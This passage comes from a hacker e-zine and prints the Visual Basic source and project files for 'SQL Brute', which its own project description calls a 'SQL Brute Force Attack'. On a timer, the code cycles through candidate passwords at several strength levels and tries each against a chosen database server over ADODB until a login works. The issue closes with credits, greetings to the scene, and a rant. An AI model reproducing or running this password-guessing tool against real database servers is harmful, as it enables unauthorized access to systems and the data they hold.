IncrementTextStringStrong = S End If End Function Function IncrementTextStringCrazy(txtcrazy As String) As String Dim L As Integer, i As Integer, c As Integer Dim S As String S = txtcrazy L = Len(S) For i = L To 1 Step -1 c = Asc(Mid(S, i, 1)) Select Case c Case 33 To 125 S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1) Exit For Case 126 S = Left(S, i - 1) & "!" & Mid(S, i + 1) End Select Next i If i = 0 Then IncrementTextStringCrazy = String(L + 1, 33) Else IncrementTextStringCrazy = S End If End Function Public Sub Option1_Click(Index As Integer) Select Case Index Case 0 strength = 0 Case 1 strength = 1 Case 2 strength = 2 Case 3 strength = 3 End Select End Sub Private Sub cmdstart_Click() Option1(0).Enabled = False Option1(1).Enabled = False Option1(2).Enabled = False Option1(3).Enabled = False txtdatabase.Enabled = False txtsource.Enabled = False txtpassword.Enabled = False txtuser.Enabled = False txtprovider.Enabled = False cmdstop.Default = True cmdstart.Enabled = False cmdstop.Enabled = True Timer1.Enabled = True End Sub Private Sub cmdstop_Click() Option1(0).Enabled = True Option1(1).Enabled = True Option1(2).Enabled = True Option1(3).Enabled = True txtdatabase.Enabled = True txtsource.Enabled = True txtpassword.Enabled = True txtuser.Enabled = True txtprovider.Enabled = True cmdstart.Default = True cmdstart.Enabled = True cmdstop.Enabled = False Timer1.Enabled = False End Sub Private Sub Timer1_Timer() On Error GoTo ErrHandler Dim varserver As String Dim vardatabase As String Dim varuser As String Dim varpassword As String Dim varamount As String Dim cn As ADODB.Connection Dim conn As String Dim rs As ADODB.Recordset Dim sql As String Dim count As String Select Case strength Case 0 txtpassword.Text = IncrementTextStringWeak(txtpassword.Text) Case 1 txtpassword.Text = IncrementTextStringNorm(txtpassword.Text) Case 2 txtpassword.Text = IncrementTextStringStrong(txtpassword.Text) Case 3 txtpassword.Text = IncrementTextStringCrazy(txtpassword.Text) End Select conn = "Provider=" & txtprovider.Text conn = conn & ";Password=" conn = conn & txtpassword.Text conn = conn & ";Persist Security Info=True;User ID=" conn = conn & txtuser.Text conn = conn & ";Data Source=" conn = conn & txtsource.Text Set cn = New ADODB.Connection cn.Open conn cn.Close Set cn = Nothing Timer1.Enabled = False Option1(0).Enabled = True Option1(1).Enabled = True Option1(2).Enabled = True Option1(3).Enabled = True txtdatabase.Enabled = True txtsource.Enabled = True txtpassword.Enabled = True txtuser.Enabled = True txtprovider.Enabled = True cmdstart.Default = True cmdstart.Enabled = True cmdstop.Enabled = False Exit Sub ErrHandler: If Not cn Is Nothing Then Set cn = Nothing End Sub - SQL_Brute.VBP: Type=Exe Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\ WINDOWS\System32\STDOLE2.TLB#OLE Automation Reference=*\G{00025E01-0000-0000-C000-000000000046}#4.0#0#..\..\..\..\..\..\ Program Files\Common Files\Microsoft Shared\DAO\DAO350.DLL#Microsoft DAO 3.51 Object Library Reference=*\G{00000206-0000-0010-8000-00AA006D2EA4}#2.6#0#..\. .\..\..\..\..\Program Files\Common Files\system\ado\msado26.tlb#Microsoft ActiveX Data Objects 2.6 Library Form=main.frm Module=Mod; Mod.bas IconForm="main" Startup="main" HelpFile="" Title="SQL Brute" ExeName32="SQL Brute.exe" Command32="" Name="SQL_Brute" HelpContextID="0" Description="SQL Brute Force Attack" CompatibleMode="0" MajorVer=1 MinorVer=0 RevisionVer=13 AutoIncrementVer=1 ServerSupportFiles=0 VersionCompanyName="h4v3n" VersionProductName="SQL Brute" CompilationType=0 OptimizationType=0 FavorPentiumPro(tm)=0 CodeViewDebugInfo=0 NoAliasing=0 BoundsCheck=0 OverflowCheck=0 FlPointCheck=0 FDIVCheck=0 UnroundedFP=0 StartMode=0 Unattended=0 Retained=0 ThreadPerObject=0 MaxNumberOfThreads=1 DebugStartupOption=0 [MS Transaction Server] AutoRefresh=1 - SQL_Brute.VBW: main = 15, 19, 606, 467, , 428, 11, 727, 539, C Mod = 66, 87, 674, 543, Z -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Credits: Without the following contributions, this 'zine issue would be fairly delayed or not released. So thank you to the following groovy people: Aestetix, Acid Data, Aftermath, Cybur netiks, CYB0RG/ASM, DoobieEx, Fr0st, H4v3n, Omin0us, The Clone, and lastly; War. Shouts: CYB0RG/ASM, Fractal, h410G3n, Wizbone, The Question, Phlux, Magma, Hack Canada, port9, Nyxojaele, Ms.O, Tr00per, Flopik, jimmiejaz, *Senorita Chandelier*, Kankraka, war, Aftermath, Aestetix, DoobieEx, io, Pinguino, nato, cyburnetiks, hypatia, coercion, tek, Nikita-dawg, h4v3n, 0min0us, sub, Alan, Kybo Ren, persephone, Kevin Poulsen (good luck at Wired News!), Emmanuel Goldstein (thank you for the free Nettwerked/K-1ine marketplace ad), the irc #hackcanada channel, The Nettwerked Meeting Crew, Nettwerked Radio artists and listeners and the entire Canadian H/P scene. Rest in Peace: The American Constitution and Canadian's rights to Privacy (fuck you BarLink -- give these fucks a peace of your mind: (780) 405-1045 ...) A N E T T W E R K E D P R O D U C T Copywrong (c) 1999 -> 2005 -> 20?? ... dun dun dun!